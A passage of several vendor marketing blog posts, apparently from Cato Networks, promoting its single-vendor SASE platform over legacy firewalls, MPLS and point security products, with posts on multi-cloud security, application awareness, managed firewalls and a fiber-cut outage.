The relationship between a cloud service provider and their customer depends on trust. Ensuring that the right certifications are in place to demonstrate an ability to support the full range of client needs is an essential part of building and maintaining that trust. A robust certification and compliance posture is more than ever an essential part of security - and it can also create opportunities and win business worldwide if well managed and updated.
As businesses grow, they should take pains to ensure that their cloud provider – and the maturity of their certifications – is growing along with them. The commitment and expertise that these accreditations signify are invaluable for organizations as they scale and bespeak a partner that’s willing to go the distance. Remember: security is a marathon, not a sprint.
If You Want a True Security Platform, You Need SASE
The cybersecurity industry is well known for its buzzwords. Every year, a new word, phrase, or acronym emerges to describe the latest and greatest tool that is absolutely essential to an organization’s ability to protect itself against cyber threats. Recently, the focus has been on ‘security platforms’, which are intended to simplify security architectures by consolidating many security capabilities within a single solution. This approach can provide many benefits, but many of these so-called ‘security platforms’ lack the ability to meet the security needs of the modern business.
The Goal: Combining Many Security Functions Within a Single Solution
Companies face a variety of cyber threats, a problem that is exacerbated by the evolution of corporate IT infrastructures and the cyber threat landscape. With the rise of cloud computing, remote work, and Internet of Things (IoT) and mobile devices, cyber threat actors have many potential targets for their attacks.
Historically, companies addressed these new cyber risks by selecting security solutions that were targeted at solving a certain problem or closing a particular security gap. For example, an organization may augment firewall security solutions with the threat prevention capabilities of an intrusion prevention system.
However, this approach often results in complex, unusable security architectures. With many standalone security solutions, corporate security teams are overloaded with security alerts, waste time configuring and context switching between solutions, and must contend with security tools that have both overlapping functionality and leave visibility and security gaps.
With the cybersecurity skills gap making it difficult to attract and retain essential security talent, many companies are focusing their efforts on simplifying and streamlining their security architectures. Integrated security platforms are the new goal, combining many security functions within a single solution in an attempt to reduce or eliminate the challenges caused by security architectures composed of an array of standalone solutions.
A Security Platform Needs to Meet a Company’s Security Needs
An effective security platform is one that is designed to meet the needs of the modern, growing corporate network. This includes the following capabilities:
Product Consolidation: Product consolidation is the key selling point of a security platform since it allows organizations to eliminate the complexity and overhead of managing many standalone solutions. Security platforms should offer several security functions — such as a next-generation firewall (NGFW), zero-trust network access (ZTNA), intrusion prevention system (IPS), cloud access security broker (CASB), and more — and be managed and monitored via a single pane of glass.
Universal Protection: The corporate WAN is rapidly expanding and includes on-prem, cloud-based, and remote devices. A security platform must be able to secure all of the corporate WAN without negatively impacting network performance, such as the latency caused by backhauling network traffic to an organization’s on-prem security architecture for inspection and policy enforcement.
Scalable Protection: Corporate networks are growing rapidly, and the introduction of cloud infrastructure, IoT devices, and other endpoints increases the volume of traffic flowing over the corporate WAN. Security platforms must be able to scale to secure growing traffic volumes without negatively impacting network performance or requiring the deployment of additional solutions.
Cloud Support: Cloud adoption is near-universal across organizations, and 80% of companies have deployed multi-cloud infrastructure. Cloud-based and on-prem infrastructure differs significantly, and security platforms should operate effectively and provide strong risk management across an organization’s entire IT architecture.
Consistent Policy Enforcement: Consistently enforcing security policies across on-prem and cloud-based infrastructure is complex, especially in multi-cloud environments where different cloud providers offer different sets of security tools and configuration options. A security platform should enable an organization to enforce security policies across all of the environments that compose an organization’s cloud infrastructure.
The goal of replacing standalone security solutions with security platforms is to simplify and streamline security. To accomplish this, security platforms must meet all of an organization’s security needs. Otherwise, companies will need to deploy additional security tools to close gaps, starting the cycle over again.
SASE is the Ultimate Security Platform
Replacing an organization’s complex security infrastructures with an integrated security platform can be a significant challenge. With diverse environments, each with its own unique security needs and limitations, identifying and configuring a solution that is universally effective can be difficult.
Secure Access Service Edge (SASE) is the only security platform with a guaranteed ability to meet all of the security requirements of the modern business. Some of the key capabilities of SASE include:
Cloud-Native Protection: SASE solutions are deployed within cloud points of presence (PoPs). SASE’s cloud-native design ensures that it can scale with the business and can secure corporate devices wherever they are.
Converged Security: SASE solutions converge many network and security functions — including ZTNA, IPS, and firewall security functions — into a single solution. This convergence eliminates the complexity caused by standalone solutions and can also enable increased efficiency and optimization.
Network-Level Protection: SASE secures the corporate network by sending all traffic through a SASE PoP en route to its destination. This ensures consistent security policy enforcement and management across all of an organization’s IT environments.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about consolidating and streamlining your organization’s security architecture with Cato SASE Cloud by signing up for a free demo today.
SASE, SSE, ZTNA, SD-WAN: Your Journey, Your Way
Organizations are in the midst of an exciting period of transformational change. Legacy IT architectures and operational models that served enterprises over the past three decades are being re-evaluated. IT organizations are now driven by the need for speed, agility, and supporting the business in a fiercely competitive environment.
What kind of transformation is needed to support the modern business? The short answer is “cloudification.” Migration of applications to the cloud had been going on for a decade, offloading complex datacenter operations away from IT, and in that way increasing business resiliency and agility. However, the migration of other pillars of IT infrastructure, such as networking and security, to the cloud is a newer trend.
Transforming Networking and Security for the Modern Enterprise
In 2019, Gartner outlined a new architecture, the Secure Access Service Edge (SASE), as the blueprint for converging a wide range of networking and security functions into a global cloud service. Key components include SD-WAN, Firewall as a Service (FWaaS), Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), and Zero Trust Network Access (ZTNA). Two years later, Gartner created a related framework focused exclusively on the security pillar of SASE, the Security Service Edge (SSE).
By moving to a converged cloud design, SASE and its major components of SD-WAN and SSE aim to eliminate the pile of point solutions, management consoles, and loose integrations that led to a rigid, costly, and complex infrastructure. This transformation addresses the root causes of IT's inability to move at the speed of business – budgetary constraints, resource limitations, and insufficient technical skills.
The Journey to a Secure Network for the Modern Enterprise
As customers started to look at the transformational power of SASE, many saw a long journey to move from their current set of appliances, services, and point solutions to a converged SASE platform. IT knows too well the challenges of migrating from proprietary applications in private datacenters to public cloud applications and cloud datacenters, a journey that is still ongoing in many enterprises today.
How should enterprise IT leaders proceed in their journey to transform networking and security? There are two dimensions to consider: the use cases and the IT constraints.
Driving Transformation through Key Use Cases
There are several key use cases to consider as the entry point to the networking and security transformation journey. Taking a platform approach to solving these immediate challenges will make addressing future challenges much easier and more cost-effective as the enterprise proceeds towards a full infrastructure transformation.
Work from Anywhere (ZTNA)
During COVID, the need for secure remote access (ZTNA) became a critical IT capability. Enterprises must be ready to provide the entire workforce, not just the road warriors, with optimized and secure access to applications, on-premises and in the cloud. Deploying a ZTNA solution that is part of the SSE pillar of a single-vendor SASE platform overcomes the scalability and security limitations of appliance-based VPN solutions. ZTNA represents a “quick win,” eliminating a legacy point solution and establishing a broad platform for continued transformation.
Cloud access control and sensitive data protection (CASB/DLP)
The adoption of public cloud applications enables users to get work done faster. However, while the cloud may only be a click away, unsanctioned applications increase business risk through security breaches, compliance violations, and data loss. Deploying the CASB and DLP capabilities in the SSE portion of a SASE platform addresses the need to control access to the cloud and protect sensitive data.
Firewall elimination (FWaaS)
One of the biggest challenges in managing an enterprise security footprint is the need to patch, upgrade, size, and retire discrete appliances. With Firewall as a Service (FWaaS), enterprises relieve themselves of this burden, migrating the WAN security and routing of firewall appliances to the cloud. FWaaS is not included in Gartner’s SSE definition but is a part of some SSE platforms, such as Cato SSE 360.
Migration of MPLS to Secure SD-WAN
The legacy MPLS services connecting locations are unsuitable for supporting cloud adoption and the remote workforce. By migrating locations from MPLS to SD-WAN and Internet connectivity, enterprises install a modern, agile network well suited toward business transformation. Customers may choose to preserve their existing security infrastructure, initially deploying only edge SD-WAN and global connectivity capabilities of a SASE platform, like Cato SASE Cloud. When ready, companies can migrate locations and users to the SSE capabilities of the SASE platform.
Whether the enterprise comes from networking or security, the right platform should enable a gradual journey to full transformation. Deploying SD-WAN that is a part of a single-vendor SASE platform enables future migration of the security infrastructure into the SSE pillar. Conversely, deploying one of the security use cases of ZTNA, CASB/DLP or FWaaS that are part of a converged SSE platform enables seamless accommodation of other security use cases. And if SSE is a part of a single-vendor SASE platform, migration can be further extended into the network to address migration from MPLS or third-party SD-WAN into a full SASE deployment.
Accelerating Your Journey by Overcoming Enterprise IT Constraints
The duration and structure of your journey is impacted by enterprise constraints. Below are some examples and best practices we learned from our customers on dealing with them.
Retiring existing solutions
The IT technology stack includes existing investments in SD-WAN, security appliances, and security services that have different contractual terms and subscription durations. Some customers want to let current contracts run their course before evaluating a move to converge existing point products into a SASE or SSE platform. Other customers work with vendors to shorten the migration period with buyout programs.
Working across organizational silos
A SASE project is cross-functional, involving the networking and security teams. Depending on organizational structure, the teams may be empowered to make standalone decisions, complicating a collaborative decision. We have seen strong IT leadership guide teams to evaluate a full transformation as an opportunity to maximize value for the business, while preserving role-based responsibility for their respective domains.
If bringing the teams together isn’t possible in the short term, a phased approach to SASE is appropriate. When SD-WAN or SSE decisions are taken independently, the teams should assess providers that can deliver a single-platform SASE even if the requirements are limited to either the networking or the security domains.
The Way Forward: Your Transformation Journey, Done Your Way
As the provider of the world’s first and most mature single-vendor SASE platform, that is powered by Cato SSE 360 and Cato’s Edge SD-WAN, we empower you to choose how to approach your transformation journey. You can start with either network transformation (SD-WAN) or security transformation (SSE 360) and then proceed to complete the transformation by seamlessly expanding the deployment to a full SASE on the very same platform. Obviously, the deeper the convergence the larger the business value and impact it will create.
To learn more about visit the following links: Cato SASE, Cato SSE 360, Cato Edge SD-WAN, and Cato ZTNA.
Inside a Network Outage: How Cato SASE Cloud Overcame Last Week’s Fiber Optic Cable Cut
Last week, once again the industry saw the importance of building your enterprise network on a global private backbone, not just the public Internet. On Monday night, a major fiber optic cable was severed in the Bouches-du-Rhône region of France. The cut impacted the Internet worldwide. Instantly, packet loss surged to 100 percent on select carriers connecting to our Marseilles, Dubai, and Hong Kong PoPs.
And, yet, despite this major outage, Cato users were unaffected. No tickets were opened; no complaints filed. Why? Because the Cato SPACE architecture detected the packet loss spike on the carrier’s network and moved user traffic to one of the other tier-1 providers connecting the Cato PoP.
All of this was done automatically and in seconds. Just look at the below report from our Marseilles PoP. Notice how at 02:21 UTC Cato isolated the two affected carriers (aqua and orange lines) and traffic was picked up by the other carriers at the PoP.
Uplink Traffic Report from Cato’s Marseilles PoP
It’s not the first time we’ve seen the resiliency of the Cato Global Private backbone. Whether it’s a network failure or a crash at a top-tier datacenter housing a Cato PoP, Cato has proven its ability to automatically recover quickly with little or no impact on the user experience.
The network engineering involved in delivering that kind of availability and performance goes to the very DNA of Cato. From the very beginning, we built our company to address both networking and security. Our founders didn’t just help build the first commercial firewall (Shlomo Kramer); they also built one of the global cloud networks (Gur Shatz). The teams they lead have built the tools and processes to lead in both domains, which is what’s required in this world of SASE.
When building the Cato Global Private Backbone, we wanted to provide enterprises with the optimum network experience regardless of a site’s location, route taken, or network condition. As such, we built many tiers of redundancy into Cato, such as users automatically connecting to the optimum PoP, instant failover between SPACE instances within a server, servers within a PoP, and between PoPs. (Follow the link for a detailed look at the resiliency built into the Cato Global Private Backbone.)
Building our backbone from third-party networks, such as those offered by Amazon, Azure or Google, would certainly have been easier, but that would also compromise our control over the underlying network. The network between two PoPs on an Azure or Amazon network in the same region or zone might be reliable enough, but what happens when those PoPs exist across the globe, in different hyperscaler regions/zones, or on separate hyperscaler networks altogether?
As both networking and security professionals, we at Cato didn’t want to leave those and other scenarios to chance. We wanted to own the problem from end to end and assure enterprise customers that they would receive the optimum performance all the time from anywhere to anywhere, even during failover conditions.
By building PoPs on our own infrastructure and curating PoP-to-PoP connectivity, we can control the routing, carrier selection, and PoP placement. Carriers connecting our PoPs have been carefully selected for zero packet loss and low latency to other PoPs and for optimal global and regional routes. Cato SPACE architecture monitors those carrier networks, automatically selecting the optimum path for every packet. This way no matter the scenario, users receive the optimum performance.
And by owning the infrastructure, we can deliver PoPs where enterprises require them not where hyperscalers want to place them. With 75+ PoPs all running Cato’s cloud-native SPACE architecture, Cato has more real time deep packet processing capacity than any hyperscaler worldwide. It’s why enterprises with users in 150+ countries trust Cato every day to help them slash telecom costs, boost performance by 20x, and increase availability to five nines by replacing their legacy MPLS networks with the Cato Global Private Backbone.
For many so-called SASE players, one or the other side gets missed. Players coming from the security world need to outsource PoP placement to third parties who understand networking. Networking vendors coming to SASE need to partner for security expertise. Both approaches compromise the SASE solution. Cato is the only vendor in the world built from the ground up to be a single-vendor SASE platform. This is why we can deliver the world’s most robust single-vendor cloud-native SASE platform – today.
Why Application Awareness is Essential for Firewall Security
Firewalls - the foundation of an organization’s network security strategy - filter network traffic and can enforce an organization’s security rules. By limiting the traffic that enters or leaves an organization’s network, a firewall can dramatically reduce its vulnerability to data breaches and other cyberattacks.
However, a firewall is only effective if it can accurately identify network traffic and apply the appropriate security policies and filtering rules. As application traffic is increasingly carried over HTTP(S), traditional, port-based methods of identifying application traffic are not always effective. Application awareness identifies the intended destination of application traffic, providing the visibility that next-generation firewalls (NGFWs) require to apply granular security policies.
What is Application Awareness?
Different network protocols have different functions and present varying security risks. This is why firewalls and other network security solutions are commonly configured with rules that apply to specific ports and protocols, such as restricting external access to certain services or looking for protocol-specific threats.
However, the growth of Software as a Service (SaaS) solutions and other web-based solutions has caused the HTTP(S) protocol to support a wider range of services. As a result, filtering traffic and applying security rules based on port numbers is less effective than before.
Application-aware networking and security solutions can identify the application that is the intended destination of network traffic. Doing so without relying solely on common port numbers requires a deep understanding of the network protocol and commands used by the application. For example, web browsing data and webmail data carried over HTTPS may have similar network packet headers but contain very different types of data.
The ability to differentiate between types of application traffic can provide several benefits beyond security. For example, an organization may implement network routing and quality of service (QoS) rules for traffic based on the target application. Latency-sensitive videoconferencing traffic may be prioritized, while browsing traffic to social media and other non-business sites may have a lower priority if it is permitted at all.
How Application Awareness Enhances Firewall Security
The Internet is increasingly dominated by HTTP(S) traffic as various applications move to web-based models with the growth of SaaS and other cloud-based services. The rise of DNS over HTTPS (DoH) and other protocols that attempt to leverage built-in TLS support within the HTTPS protocol accelerates this trend. However, these various types of traffic carried over the HTTP(S) protocol may present different levels of risk to the organization and be vulnerable to different types of attacks.
A one size fits all approach to securing these diverse applications can negatively impact application performance and security. An organization’s firewall rules may be configured based on the traffic associated with a particular protocol as a whole, so all web traffic may be permitted through, while other protocols may be blocked entirely. Additionally, security solutions may inspect traffic for malicious content that poses no risk to a particular application or overlook application-specific security risks.
Integrating application awareness into security solutions provides them with valuable context that can improve network security as well as network routing. For example, an understanding that a particular type of traffic is associated with Internet of Things (IoT) devices can enable next-generation firewalls (NGFWs) to search for threats common to those devices or block access to the devices from outside of the corporate WAN.
Granular network traffic inspection and security rules are essential to implementing an effective zero-trust security strategy. Application awareness is essential to achieving this granularity, especially as increasing volumes of application traffic are carried over the HTTP(S) protocol.
Taking Full Advantage of Application Awareness with SASE
Application awareness can provide benefits for numerous network tools, including those with both network performance and security functions. For example, on the networking side, application awareness is valuable to software-defined WAN (SD-WAN) solutions because it informs the routing of various traffic types over the corporate WAN and can help determine the priority of different types of traffic. On the security side, firewalls and other security solutions can use application awareness to tune security rules to an application’s unique needs and risk profile.
While application awareness can be implemented in each solution that uses it, this is an inefficient approach. SD-WANs, NGFWs, and other solutions that use application awareness all need to know the intended destination of a particular type of traffic. If each solution independently maintains a library of traffic signatures and applies them to each traffic flow, the result is a highly-redundant system that may negatively impact network latency and performance.
Secure Access Service Edge (SASE) solutions eliminate this redundancy and these performance impacts by converging many of the functions that require application awareness into a single solution. Under this design, SD-WANs, NGFWs, and other solutions that need insight into the destination of application traffic can access this information without computing it independently.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations and is easily managed from a single pane of glass. Learn more about Cato SASE Cloud’s targeted application security capabilities by signing up for a free demo today.
Designing a Security Strategy for the Multi-Cloud Enterprise
Cloud-based deployments provide many benefits to organizations, such as greater scalability, flexibility, and availability than many organizations can achieve in-house. However, cloud infrastructure also comes with its costs, such as the challenges of securing an organization’s on-premises and cloud environments. For organizations making the move to the cloud, redesigning their security strategies to protect multi-cloud deployments can pose a significant challenge.
Most Companies Are Multi-Cloud
Cloud adoption is growing rapidly as companies take advantage of the numerous benefits and advantages available with cloud infrastructure. However, most organizations are not selecting a single cloud provider to augment or replace their existing on-prem data centers. In fact, 89% of businesses have a multi-cloud strategy.
When looking to move to the cloud, many options are available, and different cloud platforms are optimized for particular use cases and have their own advantages and disadvantages. Since companies’ cloud-based infrastructure is designed to fulfill various purposes — data storage and hosting of both internal and public-facing applications — the variety of cloud environments makes it possible for companies to choose environments that are optimized for a particular use case.
Multi-Cloud Environments Create Security Challenges
While multi-cloud deployments provide numerous advantages when compared to on-prem infrastructure, such as scalability, flexibility, availability, and cost savings, they also have their downsides.
Some of the security challenges associated with multi-cloud environments include:
Shared Responsibility Model: In cloud environments, a cloud customer shares responsibility for managing and securing their cloud infrastructure with the cloud provider. The cloud customer must gain and maintain expertise in understanding and securing their part.
Disparate Environments: Multi-cloud deployments are composed of cloud infrastructure developed by various providers. The heterogeneity of an organization’s cloud deployment can make it complex to develop firewall security rules and enforce consistent security policies across multi-cloud and on-prem environments.
On-Prem and Cloud-Based Infrastructure: Organizations rarely abandon on-prem infrastructure entirely when they move to the cloud. As a result, they must design security architectures that span on-prem and multiple cloud deployments. In some cases, security solutions designed for one environment may be less effective or entirely unable to function in another.
Platform-Specific Solutions: Most cloud providers offer security solutions and configuration settings designed to secure deployments on their cloud platform. However, these solutions and settings vary from one provider to another, increasing the complexity of correctly configuring security settings and implementing consistent security across multiple environments.
Perimeterless Security: Historically, many organizations have adopted a perimeter-focused firewall security strategy designed to protect on-prem IT infrastructure. With cloud environments — and especially multi-cloud deployments — the perimeter has dissolved, making it necessary to design and implement a security strategy not focused on securing a perimeter.
New Security Threats: A move to the cloud opens up an organization to new security threats not present in on-prem environments. As the number of cloud environments increases, so does the number of potential attack vectors.
Many organizations struggle with cloud security due to the unfamiliarity of cloud infrastructure and the differences between securing on-prem and cloud-based environments. With multi-cloud deployments, these challenges are amplified, and companies must figure out how to secure environments where legacy security models and technologies may not be effective.
SASE Enables Effective Multi-Cloud Security
Much of the complexity of multi-cloud security comes from the fact that a multi-cloud deployment consists of many unique cloud environments. What might work to secure one environment may be ineffective or infeasible in another.
Secure Access Service Edge (SASE) solutions diminish the complexity of securing multi-cloud deployments by securing the network instead. All traffic flowing to, from, and between an organization’s cloud-based and on-prem infrastructure travels over the network. By implementing security inspection and policy enforcement at the network level, SASE can consistently apply security across an organization’s entire IT infrastructure.
In addition to simplifying multi-cloud security, SASE also provides numerous other security benefits, which include:
Global Reach: SASE is deployed within cloud-based points of presence (PoP). Globally distributed PoPs ensure that traffic can be inspected at a geographically close PoP and then routed on to its destination without the backhauling required by on-prem security deployments.
Security Integration: SASE solutions implement a full network security stack, including an NGFW, IPS, CASB, ZTNA, and more. By converging multiple security functions into a single solution, SASE achieves greater optimization than standalone solutions.
Network Optimization: SASE PoPs also integrate network optimization capabilities such as SD-WAN and a global private backbone. PoPs are also connected by dedicated, high-performance network links to optimize network performance and minimize latency.
Scalable Security: As a cloud-native solution, SASE can also take advantage of the scalability benefits of the cloud. This makes it possible for SASE PoPs to scale to secure higher-bandwidth network traffic without negatively impacting network performance.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. Cato optimizes and secures application access for all users and locations and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud can help your organization secure its on-prem and multi-cloud infrastructure by signing up for a free demo today.
New Gartner Report Identifies Four Missed Tips When Evaluating SASE Platform Capabilities
Gartner has long been clear about the core capabilities that comprise a SASE solution. And as a Representative Vendor in the 2022 Gartner® Market Guide for Single-Vendor SASE, Cato meets those capabilities, delivering SWG, CASB, ZTNA, SD-WAN, FWaaS, and malware inspection, all at line-rate operation even when decrypting traffic.
While a single platform providing those capabilities is certainly impressive, we at Cato have never thought those features alone make for a single-vendor SASE platform. To radically simplify and improve their security and network operations, IT teams require a fully converged platform. Platforms where capabilities remain discrete and fail to share context and insight force IT operations to continue juggling multiple consoles, which leads to the difficulties IT has long faced when troubleshooting and securing legacy networks.
Gartner would seem to agree. In the 2022 Gartner Market Guide for Single-Vendor SASE (available here for download), Gartner explains how the core capabilities of a well-architected single-vendor SASE offering should be integrated together, unified in management and policy, built on a unified and scalable architecture and designed in a way that makes them flexible and easy to use.
You Say Integrated, We Say Converged
What Gartner describes as integrated we prefer to call converged. But whether it’s converged or integrated, we both agree on the same point -- all capabilities must be delivered from one engine where event data is stored in one common repository and surfaced through a common analytics engine.
Unified Management and Policy: Essential for Visibility and Enforcement
Arguably the biggest operational challenge for legacy networks post-deployment is with data distributed across appliances and, by extension, data repositories. How do operational teams quickly identify, diagnose, and address potentially malicious or problematic activity and then enforce consistent security policies across the enterprise? And, as a cloud service, how is that done in a way that gives enterprise customers complete control over their own networks while running on a shared platform?
At Cato, we’ve developed the Cato SASE Cloud so that a single management console gives enterprises control over all Cato capabilities – networking and security. A single policy stack uses common data objects enabling enterprises to set common security policies for users and resources in and out of the office. And the Cato architecture is a fully multitenant, distributed architecture giving users complete control over and visibility into their own networks.
The Cloud Provides Unified and Scalable Architecture
With legacy networks, IT teams must invest considerable time and resources on maintaining their branch infrastructure. Appliances need to be upgraded as new capabilities are enabled or traffic volumes grow. And with each new security feature enabled, there’s a performance hit that further degrades the user experience.
All of which is why Cato built the Cato SASE Cloud platform on a global network of PoPs. Every Cato PoP consists of multiple compute nodes with multiple processing cores, with each core running a copy of the Cato Single Pass Cloud Engine (SPACE), Cato’s converged networking and security software stack. Cato SPACE handles all routing, optimization, acceleration, decryption, and deep packet inspection processing and decisions. SPACE is a single-pass architecture, performing all security inspections in parallel, which allows Cato to maintain wire-speed inspection regardless of traffic volumes and enabled capabilities.
Make it Flexible, Make it Easy
With legacy networks, IT leaders had a tough choice: backhaul traffic to a central inspection point simplifying operations, but add latency and undermine performance, or inspect traffic on-site for better performance but far more complicated operations and deployment.
At Cato, we found a different approach: bring processing as close to the user as possible by building out a global network of PoPs. With the Cato SASE Cloud spanning so many PoPs worldwide, enterprise locations are typically within 25ms RTT of a Cato PoP. In fact, today, Cato serves 1,500 enterprise customers with sites and users in 150+ countries. With PoPs so nearby, enterprises gain the reduced latency experience of local inspection without burdening IT. All with the simplicity of a cloud service.
Single-Vendor SASE: It’s Not Just About the Features
SASE didn’t introduce new capabilities per se. Firewalling, SWG, CASB, ZTNA, SD-WAN, and malware inspection -- all of SASE's core capabilities preceded SASE. What SASE introduced was a new way of delivering those capabilities: a singular cloud service where the capabilities are truly one -- fully converged (or integrated) together -- managed from one console and delivered globally from one platform, everywhere. Yes, evaluating features must be part of any SASE platform assessment, but to focus on features is to miss the point. It is the SASE values of convergence, simplicity, ubiquity, and flexibility -- not features -- that ultimately differentiate SASE platforms.
How a Managed Firewall Can Help Close Corporate Security Gaps
As organizations grow more reliant on expanding IT infrastructures, cyber threats are also growing more sophisticated. A mature security program is essential to protect the organization against cyber attacks. However, many security teams lack the resources and personnel to keep pace with their expanding duties.
As security teams become overwhelmed, identifying ways to ease their burden is essential to minimizing the security gaps that leave companies vulnerable to attacks.
Most Security Teams are Struggling
Security teams’ responsibilities are rapidly expanding, and many are struggling to keep up. Some of the major challenges that IT and security teams face include:
Expanding IT Infrastructure: Corporate IT infrastructures are expanding and growing more diverse due to numerous drivers. Companies are increasingly adopting cloud infrastructure, remote and hybrid work models, and Internet of Things (IoT) and mobile devices. All of these bring new attack vectors and unique security requirements.
Heterogeneous Architectures: The modern IT environment includes various architectures and environments. Each of these must be properly configured and secured. This can create a diverse security architecture of standalone products that are difficult to effectively monitor and manage.
Security Alert Overload: This collection of various security solutions also contributes to the alert overload facing modern security teams. The average enterprise security operations center (SOC) sees over 10,000 alerts per day, each of which requires an average of 24-30 minutes to address. With the inability to properly investigate every security alert — or even a reasonable percentage of them — security teams might make decisions that let real threats slip through the gaps, potentially while they waste their efforts on false positives.
Vulnerability Management: Software vulnerabilities in production systems are an issue that is quickly spiraling out of control. Over 28,000 new vulnerabilities were discovered in 2021 alone, a 23% growth over the more than 23,000 discovered the previous year. Identifying, testing, and applying patches for vulnerabilities in corporate software and hardware — including the third-party libraries and components used by them — is a significant task, and many patch management programs lag behind, leaving the organization vulnerable.
At the same time, the cybersecurity industry is facing a significant skills gap, which means that companies struggle to attract and retain skilled personnel to fill critical roles. Overwhelmed and understaffed security teams lead to security gaps.
Firewall Management is a Major Chore
Closing these security gaps requires the ability to reduce security teams’ workloads to a manageable level. One area with significant room for improvement is firewall management.
A network firewall is the cornerstone of an organization’s security architecture; however, it is not an easy tool to manage. Some of the time-consuming duties associated with firewall management include:
Firewall Rule Maintenance: Network firewall rules should be designed to restrict network traffic to only that required for business purposes. With increasingly diverse IT infrastructures, organizations must develop and maintain a range of firewall rules tuned to the needs of different devices and environments.
Patch Management: Like other products, firewalls need patches and updates, and, due to their role within an organization’s environment, are common targets of attack. Security personnel should promptly test and apply updates when they become available.
Monitoring and Management: Firewalls are not “set it and forget it” systems and require ongoing monitoring and maintenance to be effective. Investigating alerts, validating the effectiveness of firewall rules, and other ongoing activities consume time and resources.
Firewalls can significantly benefit an organization by blocking inbound and WAN-bound attacks before they reach their intended targets. By performing all of these firewall management tasks, security personnel lower corporate cybersecurity risk and achieve clear benefits to the organization.
However, the time spent configuring and managing firewalls could also be spent on other valuable security tasks. For example, the time and resources devoted to firewall management could have been used to identify and remediate an intrusion before it became a data breach or malware infection.
A Managed Firewall Realigns Security Priorities
Security teams have roles and responsibilities that commonly exceed their abilities to carry them out. As corporate infrastructure grows larger and more complex, the growth in security team headcount cannot keep up. As a result, some work may be left undone, and security teams are often forced to perform triage to determine which tasks can be delayed or left incomplete with minimal risk to the organization.
Organizations can resolve this issue by taking steps to alleviate the burden on security personnel. By taking some of the tedious work, such as firewall maintenance, off their plates, an organization can free up resources and its security team’s time and expertise for tasks where they are needed more.
A managed firewall can enhance security while reducing overload on security personnel. A managed firewall service enables an organization to outsource responsibility for firewall management to a team of third-party experts. This provides companies with firewall rules based on evolving threat intelligence and solutions configured in accordance with industry best practice and regulatory requirements.
A managed Secure Access Service Edge (SASE) deployment takes this a step further, handing over the responsibility for maintenance of the organization’s entire network security stack to a third-party provider instead of just the firewall. Managed SASE also comes with additional benefits, such as improved integration of network and security functionality and optimized routing of WAN traffic over dedicated network links.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a complete cloud-native security service edge, Cato SSE 360, including Zero Trust Network Access (ZTNA), Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), and Firewall as a Service (FWaaS) into a global cloud service. Cato optimizes and secures application access for all users, locations, and applications, and empowers IT with a simple and easy to manage networking and security architecture. Learn more about optimizing your organization’s security operations by signing up for a free demo today.
September 28, 2022
SASE Enables Consistent Security for the Modern Enterprise
Corporate IT networks are rapidly changing. Evolving cloud and technological innovation have spurred digital transformation efforts. The pandemic has normalized remote and hybrid work, causing many employees to work from outside the office and creating the need to securely provide remote access to the workforce.
These changes in corporate IT infrastructure create new security challenges as companies adapt to protect new environments and to combat an evolving cyber threat landscape. In many cases, organizations are finding that their existing security architecture — which was designed to secure an IT infrastructure that is mostly or wholly on-premises — is not up to the task of meeting the security requirements and business needs of the modern, digital enterprise.
The Corporate WAN is Rapidly Changing
In the past, the majority of an organization’s IT assets were located on-prem. The company managed its own data centers, and employees were primarily connected directly to the corporate LAN. Additionally, a company’s IT assets were largely homogenous, consisting of workstations and servers that had similar, well-known security needs.
Within the last several years, the corporate network has undergone significant changes. With the introduction of cloud computing, a growing percentage of an organization’s IT assets are located outside of the traditional network perimeter on infrastructure managed by a third party. Since 89% of companies have multi-cloud deployments, companies must learn to properly operate and manage multiple vendors’ unique solutions.
The growth of remote and hybrid work models in recent years has further transformed the corporate network. In addition to moving employees and their devices off-site, remote work also impacts the range of devices used for business purposes. Mobile devices are increasingly gaining access to corporate data and systems, and bring your own device (BYOD) policies mean that company data may be accessed and stored on devices that the company does not own or fully control.
Finally, the adoption of new technologies to improve corporate productivity and efficiency has an impact. Internet of Things (IoT) devices — including both commercial and consumer systems — are connected to corporate networks. These IoT devices have unique security challenges and introduce significant risk to corporate networks.
As corporate IT environments change, so do their security needs. New environments and devices have unique security risks that must be mitigated. Solutions designed for on-prem, primarily desktop environments may not effectively protect new infrastructure, if they can be used there at all.
Legacy Solutions Do Not Fit Modern Security Needs
Many organizations have existing security architectures that are designed for a particular IT architecture. As this architecture evolves, these security solutions are often ill-suited to securing an organization’s new deployment environments and devices for various reasons, including:
Location-Specific Protection: Often, corporate security architectures are designed to define and secure the perimeter of the corporate network against inbound threats and outbound data exfiltration. However, the growth of cloud computing, remote work, and the IoT means that this perimeter is rapidly expanding to the point where it is infeasible and pointless to secure since it includes the entire Internet.
Limited Scalability: Appliance-based security solutions, such as network firewalls, are limited by their hardware. A computer only has so much memory and CPU, and a network interface card has a maximum throughput. Cloud scalability and the growth of corporate networks can result in security appliances being overwhelmed with more traffic than they can handle.
Computational Requirements: Many endpoint security solutions require a certain amount of processing power or memory on the device to function. As resource-constrained devices such as mobile and IoT devices become more common, these solutions may not be usable in all areas of an organization’s IT infrastructure.
Environment-Specific Requirements: As corporate IT environments grow more complex and diverse, different environments may have specific security considerations. For example, appliance-based network firewalls and security solutions are not a feasible option in cloud deployments since the organization lacks control over its underlying IT infrastructure.
Attempting to adapt an organization’s existing security architecture to secure its evolving environment can create disjointed security policies that are inconsistently enforced across the corporate WAN. For example, cloud-based infrastructure can be protected by cloud-focused security solutions that differ from those protecting on-prem infrastructure, which increases the complexity and overhead of security management. Remote workers and mobile devices may suffer network performance issues as traffic is backhauled for security inspection before being routed on to its destination.
